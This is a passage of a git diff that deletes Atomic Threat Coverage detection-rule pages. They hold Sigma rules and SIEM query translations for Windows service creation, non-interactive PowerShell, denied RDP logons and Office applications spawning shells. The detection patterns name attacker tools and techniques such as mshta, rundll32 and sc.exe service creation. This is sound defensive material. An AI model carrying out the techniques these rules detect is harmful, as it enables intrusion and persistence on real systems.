-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["4720", "4781"] (caller_user="*$*" OR target_user="*$*" OR user="*$*" OR member="*$*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4720|.*4781))(?=.*.*\$.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_new_service_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_new_service_creation.md
deleted file mode 100644
index a6f0f0f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_new_service_creation.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | New Service Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects creation if a new service |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrator or user creates a service for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1050/T1050.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1050/T1050.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>attack.t1543.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: New Service Creation
-id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab
-status: experimental
-description: Detects creation if a new service
-author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1050
-    - attack.t1543.003
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1050/T1050.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        - Image|endswith: '\sc.exe'
-          CommandLine|contains|all:
-            - 'create'
-            - 'binpath'
-        - Image|endswith: '\powershell.exe'
-          CommandLine|contains: 'new-service'
-    condition: selection
-falsepositives:
-    - Legitimate administrator or user creates a service for legitimate reason
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\sc.exe" -and $_.message -match "CommandLine.*.*create.*" -and $_.message -match "CommandLine.*.*binpath.*") -or ($_.message -match "Image.*.*\\powershell.exe" -and $_.message -match "CommandLine.*.*new-service.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\sc.exe AND winlog.event_data.CommandLine.keyword:*create* AND winlog.event_data.CommandLine.keyword:*binpath*) OR (winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:*new\-service*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7fe71fc9-de3b-432a-8d57-8c809efc10ab <<EOF
-{
-  "metadata": {
-    "title": "New Service Creation",
-    "description": "Detects creation if a new service",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1050",
-      "attack.t1543.003"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\sc.exe AND winlog.event_data.CommandLine.keyword:*create* AND winlog.event_data.CommandLine.keyword:*binpath*) OR (winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*new\\-service*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\sc.exe AND winlog.event_data.CommandLine.keyword:*create* AND winlog.event_data.CommandLine.keyword:*binpath*) OR (winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*new\\-service*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'New Service Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\sc.exe AND CommandLine.keyword:*create* AND CommandLine.keyword:*binpath*) OR (Image.keyword:*\\powershell.exe AND CommandLine.keyword:*new\-service*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\sc.exe" CommandLine="*create*" CommandLine="*binpath*") OR (Image="*\\powershell.exe" CommandLine="*new-service*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\sc.exe" CommandLine="*create*" CommandLine="*binpath*") OR (Image="*\\powershell.exe" CommandLine="*new-service*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\sc\.exe)(?=.*.*create.*)(?=.*.*binpath.*))|.*(?:.*(?=.*.*\powershell\.exe)(?=.*.*new-service.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_non_interactive_powershell.md b/Atomic_Threat_Coverage/Detection_Rules/win_non_interactive_powershell.md
deleted file mode 100644
index 4b55874..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_non_interactive_powershell.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Non Interactive PowerShell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate programs executing PowerShell scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/basic_powershell_execution.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/basic_powershell_execution.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Non Interactive PowerShell
-id: f4bbd493-b796-416e-bbf2-121235348529
-description: Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.
-status: experimental
-date: 2019/09/12
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/basic_powershell_execution.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\powershell.exe'
-    filter:
-        ParentImage|endswith: '\explorer.exe'
-    condition: selection and not filter
-falsepositives:
-    - Legitimate programs executing PowerShell scripts
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\powershell.exe" -and  -not ($_.message -match "ParentImage.*.*\\explorer.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\powershell.exe AND (NOT (winlog.event_data.ParentImage.keyword:*\\explorer.exe)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f4bbd493-b796-416e-bbf2-121235348529 <<EOF
-{
-  "metadata": {
-    "title": "Non Interactive PowerShell",
-    "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND (NOT (winlog.event_data.ParentImage.keyword:*\\\\explorer.exe)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\powershell.exe AND (NOT (winlog.event_data.ParentImage.keyword:*\\\\explorer.exe)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Non Interactive PowerShell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\powershell.exe AND (NOT (ParentImage.keyword:*\\explorer.exe)))
-```
-
-
-### splunk
-    
-```
-(Image="*\\powershell.exe" NOT (ParentImage="*\\explorer.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\powershell.exe"  -(ParentImage="*\\explorer.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\powershell\.exe)(?=.*(?!.*(?:.*(?=.*.*\explorer\.exe)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_not_allowed_rdp_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_not_allowed_rdp_access.md
deleted file mode 100644
index bcc34d0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_not_allowed_rdp_access.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Denied Access To Remote Desktop       |
-|:-------------------------|:------------------|
-| **Description**          | This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1076: Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Valid user was not added to RDP group</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825)</li></ul>  |
-| **Author**               | Pushkarev Dmitry |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Denied Access To Remote Desktop
-id: 8e5c03fa-b7f0-11ea-b242-07e0576828d9
-description: This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.
-    Often, this event can be generated by attackers when searching for available windows servers in the network.
-status: experimental
-tags:
-    - attack.lateral_movement
-    - attack.t1076
-references:
-    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825
-author: Pushkarev Dmitry
-date: 2020/06/27
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4825
-    condition: selection
-fields:
-    - EventCode
-    - AccountName
-    - ClientAddress
-falsepositives:
-    - Valid user was not added to RDP group
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4825") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4825")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8e5c03fa-b7f0-11ea-b242-07e0576828d9 <<EOF
-{
-  "metadata": {
-    "title": "Denied Access To Remote Desktop",
-    "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1076"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4825\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4825\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Denied Access To Remote Desktop'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n    EventCode = {{_source.EventCode}}\n  AccountName = {{_source.AccountName}}\nClientAddress = {{_source.ClientAddress}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:"4825"
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4825") | table EventCode,AccountName,ClientAddress
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4825")
-```
-
-
-### grep
-    
-```
-grep -P '^4825'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_office_shell.md b/Atomic_Threat_Coverage/Detection_Rules/win_office_shell.md
deleted file mode 100644
index 38f08b8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_office_shell.md
+++ /dev/null
@@ -1,212 +0,0 @@
-| Title                    | Microsoft Office Product Spawning Windows Shell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a Windows command line executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1202: Indirect Command Execution](https://attack.mitre.org/techniques/T1202)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1202: Indirect Command Execution](../Triggers/T1202.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100](https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100)</li><li>[https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html](https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html)</li></ul>  |
-| **Author**               | Michael Haag, Florian Roth, Markus Neis |
-| Other Tags           | <ul><li>car.2013-02-003</li><li>car.2014-04-003</li><li>attack.t1059.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Microsoft Office Product Spawning Windows Shell
-id: 438025f9-5856-4663-83f7-52f878a70a50
-status: experimental
-description: Detects a Windows command line executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio.
-references:
-    - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100
-    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1059
-    - attack.t1202
-    - car.2013-02-003
-    - car.2014-04-003
-    - attack.t1059.003
-author: Michael Haag, Florian Roth, Markus Neis
-date: 2018/04/06
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\WINWORD.EXE'
-            - '*\EXCEL.EXE'
-            - '*\POWERPNT.exe'
-            - '*\MSPUB.exe'
-            - '*\VISIO.exe'
-            - '*\OUTLOOK.EXE'
-        Image:
-            - '*\cmd.exe'
-            - '*\powershell.exe'
-            - '*\wscript.exe'
-            - '*\cscript.exe'
-            - '*\sh.exe'
-            - '*\bash.exe'
-            - '*\scrcons.exe'
-            - '*\schtasks.exe'
-            - '*\regsvr32.exe'
-            - '*\hh.exe'
-            - '*\wmic.exe'  # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/
-            - '*\mshta.exe'
-            - '*\rundll32.exe'
-            - '*\msiexec.exe'
-            - '*\forfiles.exe'
-            - '*\scriptrunner.exe'
-            - '*\mftrace.exe'
-            - '*\AppVLP.exe'
-            - '*\svchost.exe'  # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\WINWORD.EXE" -or $_.message -match "ParentImage.*.*\\EXCEL.EXE" -or $_.message -match "ParentImage.*.*\\POWERPNT.exe" -or $_.message -match "ParentImage.*.*\\MSPUB.exe" -or $_.message -match "ParentImage.*.*\\VISIO.exe" -or $_.message -match "ParentImage.*.*\\OUTLOOK.EXE") -and ($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\cscript.exe" -or $_.message -match "Image.*.*\\sh.exe" -or $_.message -match "Image.*.*\\bash.exe" -or $_.message -match "Image.*.*\\scrcons.exe" -or $_.message -match "Image.*.*\\schtasks.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\hh.exe" -or $_.message -match "Image.*.*\\wmic.exe" -or $_.message -match "Image.*.*\\mshta.exe" -or $_.message -match "Image.*.*\\rundll32.exe" -or $_.message -match "Image.*.*\\msiexec.exe" -or $_.message -match "Image.*.*\\forfiles.exe" -or $_.message -match "Image.*.*\\scriptrunner.exe" -or $_.message -match "Image.*.*\\mftrace.exe" -or $_.message -match "Image.*.*\\AppVLP.exe" -or $_.message -match "Image.*.*\\svchost.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:(*\\WINWORD.EXE OR *\\EXCEL.EXE OR *\\POWERPNT.exe OR *\\MSPUB.exe OR *\\VISIO.exe OR *\\OUTLOOK.EXE) AND winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\powershell.exe OR *\\wscript.exe OR *\\cscript.exe OR *\\sh.exe OR *\\bash.exe OR *\\scrcons.exe OR *\\schtasks.exe OR *\\regsvr32.exe OR *\\hh.exe OR *\\wmic.exe OR *\\mshta.exe OR *\\rundll32.exe OR *\\msiexec.exe OR *\\forfiles.exe OR *\\scriptrunner.exe OR *\\mftrace.exe OR *\\AppVLP.exe OR *\\svchost.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/438025f9-5856-4663-83f7-52f878a70a50 <<EOF
-{
-  "metadata": {
-    "title": "Microsoft Office Product Spawning Windows Shell",
-    "description": "Detects a Windows command line executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio.",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1059",
-      "attack.t1202",
-      "car.2013-02-003",
-      "car.2014-04-003",
-      "attack.t1059.003"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\WINWORD.EXE OR *\\\\EXCEL.EXE OR *\\\\POWERPNT.exe OR *\\\\MSPUB.exe OR *\\\\VISIO.exe OR *\\\\OUTLOOK.EXE) AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\scrcons.exe OR *\\\\schtasks.exe OR *\\\\regsvr32.exe OR *\\\\hh.exe OR *\\\\wmic.exe OR *\\\\mshta.exe OR *\\\\rundll32.exe OR *\\\\msiexec.exe OR *\\\\forfiles.exe OR *\\\\scriptrunner.exe OR *\\\\mftrace.exe OR *\\\\AppVLP.exe OR *\\\\svchost.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\WINWORD.EXE OR *\\\\EXCEL.EXE OR *\\\\POWERPNT.exe OR *\\\\MSPUB.exe OR *\\\\VISIO.exe OR *\\\\OUTLOOK.EXE) AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\scrcons.exe OR *\\\\schtasks.exe OR *\\\\regsvr32.exe OR *\\\\hh.exe OR *\\\\wmic.exe OR *\\\\mshta.exe OR *\\\\rundll32.exe OR *\\\\msiexec.exe OR *\\\\forfiles.exe OR *\\\\scriptrunner.exe OR *\\\\mftrace.exe OR *\\\\AppVLP.exe OR *\\\\svchost.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Microsoft Office Product Spawning Windows Shell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:(*\\WINWORD.EXE *\\EXCEL.EXE *\\POWERPNT.exe *\\MSPUB.exe *\\VISIO.exe *\\OUTLOOK.EXE) AND Image.keyword:(*\\cmd.exe *\\powershell.exe *\\wscript.exe *\\cscript.exe *\\sh.exe *\\bash.exe *\\scrcons.exe *\\schtasks.exe *\\regsvr32.exe *\\hh.exe *\\wmic.exe *\\mshta.exe *\\rundll32.exe *\\msiexec.exe *\\forfiles.exe *\\scriptrunner.exe *\\mftrace.exe *\\AppVLP.exe *\\svchost.exe))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\WINWORD.EXE" OR ParentImage="*\\EXCEL.EXE" OR ParentImage="*\\POWERPNT.exe" OR ParentImage="*\\MSPUB.exe" OR ParentImage="*\\VISIO.exe" OR ParentImage="*\\OUTLOOK.EXE") (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\sh.exe" OR Image="*\\bash.exe" OR Image="*\\scrcons.exe" OR Image="*\\schtasks.exe" OR Image="*\\regsvr32.exe" OR Image="*\\hh.exe" OR Image="*\\wmic.exe" OR Image="*\\mshta.exe" OR Image="*\\rundll32.exe" OR Image="*\\msiexec.exe" OR Image="*\\forfiles.exe" OR Image="*\\scriptrunner.exe" OR Image="*\\mftrace.exe" OR Image="*\\AppVLP.exe" OR Image="*\\svchost.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\WINWORD.EXE", "*\\EXCEL.EXE", "*\\POWERPNT.exe", "*\\MSPUB.exe", "*\\VISIO.exe", "*\\OUTLOOK.EXE"] Image IN ["*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe", "*\\sh.exe", "*\\bash.exe", "*\\scrcons.exe", "*\\schtasks.exe", "*\\regsvr32.exe", "*\\hh.exe", "*\\wmic.exe", "*\\mshta.exe", "*\\rundll32.exe", "*\\msiexec.exe", "*\\forfiles.exe", "*\\scriptrunner.exe", "*\\mftrace.exe", "*\\AppVLP.exe", "*\\svchost.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\WINWORD\.EXE|.*.*\EXCEL\.EXE|.*.*\POWERPNT\.exe|.*.*\MSPUB\.exe|.*.*\VISIO\.exe|.*.*\OUTLOOK\.EXE))(?=.*(?:.*.*\cmd\.exe|.*.*\powershell\.exe|.*.*\wscript\.exe|.*.*\cscript\.exe|.*.*\sh\.exe|.*.*\bash\.exe|.*.*\scrcons\.exe|.*.*\schtasks\.exe|.*.*\regsvr32\.exe|.*.*\hh\.exe|.*.*\wmic\.exe|.*.*\mshta\.exe|.*.*\rundll32\.exe|.*.*\msiexec\.exe|.*.*\forfiles\.exe|.*.*\scriptrunner\.exe|.*.*\mftrace\.exe|.*.*\AppVLP\.exe|.*.*\svchost\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_office_spawn_exe_from_users_directory.md b/Atomic_Threat_Coverage/Detection_Rules/win_office_spawn_exe_from_users_directory.md
deleted file mode 100644
index 8e600fc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_office_spawn_exe_from_users_directory.md
+++ /dev/null
@@ -1,192 +0,0 @@
-| Title                    | MS Office Product Spawning Exe in User Dir       |
-|:-------------------------|:------------------|
-| **Description**          | Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1202: Indirect Command Execution](https://attack.mitre.org/techniques/T1202)</li></ul>  |
